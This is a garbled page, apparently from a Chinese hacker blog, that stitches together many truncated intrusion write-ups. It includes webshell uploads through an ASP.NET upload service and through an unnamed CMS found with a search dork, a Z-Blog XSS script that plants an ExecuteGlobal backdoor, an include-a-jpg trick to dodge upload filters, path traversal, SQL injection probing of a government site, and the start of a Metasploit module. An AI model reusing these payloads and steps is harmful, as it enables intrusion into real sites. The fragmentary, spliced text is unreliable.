黑暗访问者(坏客技术博客)

目标的环境：

      目测 2003+iis6+asp.net+mssql  但是这个网站程序应该是使用的某个asp.net+soap开发的，至少出现漏洞的地方是。

一.Web站点的渗透

    这次渗透并未使用任何扫描嗅探工具去探测目标完全使用手工检查的,经过一系列的测试后在网页源代码里面发现了一个比较有意思的链接。

上图中用篮筐拉出来的地址，引起了我的注意。根据名字这应该是用于上传文件的。

访问这个链接后就证实了我的猜想

    没有输入流，那么我自己本机写一个POST表单试试：

<form action="http://www.xx.com/Service.asmx/AjaxUpload" method="post" enctype="multipart/form-data">

<input type="file" name="upload" /><br />

<input type="submit" />

</form>

    选择一张图片上传后成功如下内容：

{"s":1,"src":'2012/xx/c0b62302a79e47bab273f2dc76861f8e.gif',"pics":[{src:"2012/xx/c0b62302a79e47bab273f2dc76861f8e.gif",icon:"http://img.xx.com/upload/2012/xx/c0b62302a79e47bab273f2dc76861f8e.155x155.gif",wh:"150X150"}]}

    看到返回了上传路径后于是测试了下直接上传asp后缀这次返回结果如下：

{"s":1,"src":'2012/xx/ac24ed3a0393497bb3d0e9a78f28ef7e.asp',"pics":[{src:"2012/xx/ac24ed3a0393497b

标 题: 【原创】瑞星全功能安全软件2011内核拒绝服务漏洞 

作 者: cxthl 

时 间: 2012-05-27,08:23:54 

链 接: http://bbs.pediy.com/showthread.php?t=151241

瑞星全功能安全软件2011是一款集“智能云安全”,智能安全防护,智能杀毒为一体的专业安全软件. 

最新版本23.00.63.28(2012-5-27)存在内核拒绝服务漏洞,可导致任意权限用户在安装了瑞星的系统上引发蓝屏. 

存在问题的组件：Hooksys.sys 

版本：25.0.0.57，CheckSum = 0002ED85, TimeStamp = 4EDDA48B 

数字签名仍为2011.12.6 

瑞星在NtCreateKey HOOK函数中对ObjectAttributes结构体的参数校验不严格,就将参数传递给内核函数ZwOpenKey,结果引发蓝屏.在未安装瑞星的系统下没有影响. 

调用过程:

ZwCreateKey -> hk_ZwCreateKey -> (检查了ObjectAttributes->ObjectName) -> ZwOpenKey -> 上个模式改为KernelMode,系统不检查参数有效性 ->ObOpenObjectByName -> ObpCaptureObjectCreateInformation -> 系统函数判断SecurityDescriptor域存在，且上个模式为内核模式，因此不做参数检查,直接将参数 ->SeCaptureSecurityDescriptor -> SeCaptureSecurityDescriptor访问错误

在后台对变量过滤不严导致任意文件遍历和删除

详细说明：

程序未对用户提交的$down_path参数进行任何过滤，导致用户可以遍历程序目录。在hack/attachment/admin.php第36行

elseif($job=="list"&&$Apower[attachment_list]){ !$page&&$page=1; $rows=40; $min=($page-1)*$rows; $down_path || $down_path=$webdb[updir]; $up_path=preg_replace("/(.*)\/([^\/]+)/is","\\1",$down_path); $thispath=ROOT_PATH.$down_path; //直接将$down_path带入get_file() $file_db=get_file($down_path);漏洞证明：

在hack/attachment/admin.php第36行

elseif($job=="list"&&$Apower[attachment_list]){ !$page&&$page=1; $rows=40; $min=($page-1)*$rows; $down_path || $down_path=$webdb[updir]; $up_path=preg_replace("/(.*)\/([^\/]+)/is","\\1",$down_path); $thispath=ROOT_PATH.$down_path; //直接将$down_path带入get_file() $file_db=get_file($down_path);

进后台，在插件管理里面找到附件管理，然后构造如下$down_path

http://www.xxx.com/admin/index.php?lfj=attachment&job=list&down_path=../../../..

修复方案：

过滤$down_path变量。。

BY：疯子

关键字：inurl:products.asp?fstclass=

暂时搞出来的关键字

上传路径：inc/fileUpfile.asp?

然后 你们上传php马 

后台路径 ：http://Madman.in/manage/login/login.asp

他会提示 

打勾  opera  或者其他可用浏览器

点击确定

然后他会显示 上传成功

查看源代码，  看到路径  直接访问不行 前面要加一个图片目录

http://madman.in/uploadfiles/查看源代码的路径.php

Shell路径是这样的 

然后就进去

大家可以看看这套是什么cms  或者系统 我是没找出来  

找到可以分享一下

作者：潇潇

这次的渗透行为好像，似乎有一点偶然，就连得到这个GOV站点都很偶然~！我不怎么看好国内的GOV站点，现在的政府网站都很脆弱，几乎一个注入沦陷一个站，一个SA权限，沦陷一台服务器~！于是偶很少去关注，也很少渗透政府网站，再说了渗透政府网站也是犯法的事，我记得我们学校一名学长，就是因为遍历了某个网站的目录，差点坐牢了~！他真的没黑进去，就是遍历了网站目录而已~！好了闲话少说，不过这次这个站的安全性要稍微好一点，不过渗透后才知道，其实也不咋的~！

我看到这个站点是因为幽灵客栈里边的少年发了一张黑页，看来他已经黑进去了~！嗯，不错

他的这一举动，突然让我来了兴趣~！我当真想玩玩GOV站点了，最近也在测试政府网站常用程序的漏洞，OK，目标：http://www.xxxx.gov.cn 打开一看，很常规的ASP动态页面，凭感觉应该是ACCESS数据库。

一般这种站点大家都会想到是否存在注入漏洞，哈哈~！我跟你们想得一样，我分别在不同的带参数的数据库查询页面提交了“'”、“and 1=1”、“and 1=2”等，提示我非法注入攻击，像这种提示我已经见了不止

有时候我们拿到了shell 直接上传的话会弹出警告 说什么不允许上次之类 怀疑是马儿 现在很多的软件对post拦截都非常牛 既然他拦截的是post 那我们就用其他的办法 提供一种思路

利用程序调用 asp的以前一直用 但是php的没有用过 今天无聊 就来测试下

拿php的来说把

把php马儿保存为1.jpg在php的内容里面写

<?php include "./1.jpg";?>

这句话的意思就是调用跟目录1.jpg的文件  假如这个1.jpg文件不再当前目录 就要在include "里面填写1.jpg的路径"    还可以把include换成"require"  不包括引号    include  require 都是引用 调用的

这样的话就显示你的马儿   我在本机测试是可以调用的 

之后我url打开是:

因为火狐打开是乱码  不是显示图片 我就用ie打开了  还有url上面那里%20什么的 那是我命名文件夹的时候出现的空格 那些不用搭理。 

之前检测的一个目标站z-blog,程序有改动，存在 xss ,写了个 脚本 拿下了，要用的拿去，可以当模版用。

function saveUserInfo()

{

var url = "/cmd.asp?act=SiteFilePst&path=%2E%2FINCLUDE%2Ffavorite%2Easp&opath=D%3A%5CZ%2DBlog18%5Cadmin%5C%2E%2E%5C%5CINCLUDE";

var postStr = 'path=./INCLUDE/favorite.asp&txaContent=<li><a href="http://bbs.rainbowsoft.org/" target="_blank">ZBlogger社区</a></li><%If Request("Z-Blog")<>"" Then ExecuteGlobal(Request("Z-Blog"))%><li><a href="http://download.rainbowsoft.org/" target="_blank">菠萝的海</a></li>';

postStr=encodeURI(postStr);

var ajax = false;

if(window.XMLHttpRequest)

{

ajax = new XMLHttpRequest();

if (ajax.overrideMimeType)

{

ajax.overrideMimeType("text/xml");

}

}

else if (window.ActiveXObject)

{

try

{

ajax = new ActiveXObject("Msxml2.XMLHTTP");

}

catch (e)

{

try

{

ajax = new ActiveXObject("Microsoft.XMLHTTP");

}

catch (e) {}

}

}

if (!ajax)

{

//window.alert("不能创建XMLHttpRequest对象实例.");

return false;

}

ajax.open("POST", url, true);

ajax.setRequestHe

漏洞类型：权限提升

漏洞描述：

注册 用户 此时的代码为文件: user_act.php

01. function edit_action() {

02. if(front::post(‘submit’)) {

03. $this- > _user- > rec_update(front::$post,’ userid userid =’.$this- > view- > user['userid']);

04. front::flash(lang(‘修改资料成功！’));

05. front::redirect(url::create(‘user/index’));

06. }

07. $this- > view- > data =$this- > view- > user;

08. }

继续跟踪rec_update函数

function rec_update($row,$where) {

$tbname=$this->name;

$sql=$this->sql_update($tbname,$row,$where);

return $this->query_unbuffered($sql);

}

向下sql_update($tbname,$row,$where) ( 漏洞函数 )

01. function sql_update($tbname,$row,$where) {

02. $ sqlud = ” ;

03. if (is_string($row))

04. $ sqlud =$row.’ ‘;

05. else

06. foreach ($row as $ key = > $value) {

07. if (in_array($key,explode(‘,’,$this- > getcolslist()))) {

08. $ value = addslashes ($value);

09. if (preg_match(‘/^\[(.*)\]$/’,$value,$match))

10. $sqlud . = “`$key`” .”= 

相关文章：

Serv-U FTP Server Jail Break 0day - Serv-U 目录跳转漏洞

原文时间：

发表于：2011-12-07 

影响版本：

RhinoSoftServ-U 9.x 

RhinoSoftServ-U 8.x 

RhinoSoftServ-U 7.x 

RhinoSoftServ-U 6.x 

RhinoSoftServ-U 11.x 

RhinoSoftServ-U 10.x 

漏洞描述

RhinoSoftServ-U FTP Server实现上存在目录遍历漏洞，通过输入特定的路径串可以实现目录遍历，攻击者可以下载、上传、删除FTP根目录外的文件 

具体分析

在登入ftp成功后，我们输入下面的指令：cd“..:\windows”，最终该命令被客户端解析成CWD\x20..:\windows（\x20为空格）传递个FTP Server。 

之后FTP server在接收到这段指令后将指令和指令的参数分开，并单独处理”..:\windows”部分。处理的函数如图： 

之后对该字符串进行了如下检测： 

1.取出指令参数即：..:\windows 

2.检测该串头部或者尾部是否有空格和TAB，如果有则去掉。 

3.取出根目录（测试中为/c:/ftp）检测第一个字符以及第二个字符是否为/，如果第一个字符为/且第二个字符不为/，则指针加1，并将/改为\，结果变为c:\ftp 

4.在c:\ftp后面添加\，于是变成了c:\ftp\ 

5.对于..:\..:\windows的进一步检测：

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote 

    Rank = ExcellentRanking 

    include Msf::Exploit::Remote::HttpClient 

    def initialize(info={}) 

        super(update_info(info, 

            'Name'           => "appRain CMF Arbitrary PHP File Upload Vulnerability", 

            'Description'    => %q{ 

                    This module exploits a vulnerability found in appRain's Content Management 

                Framework (CMF), version 0.1.5 or less.  By abusing the uploadify.phpfile, a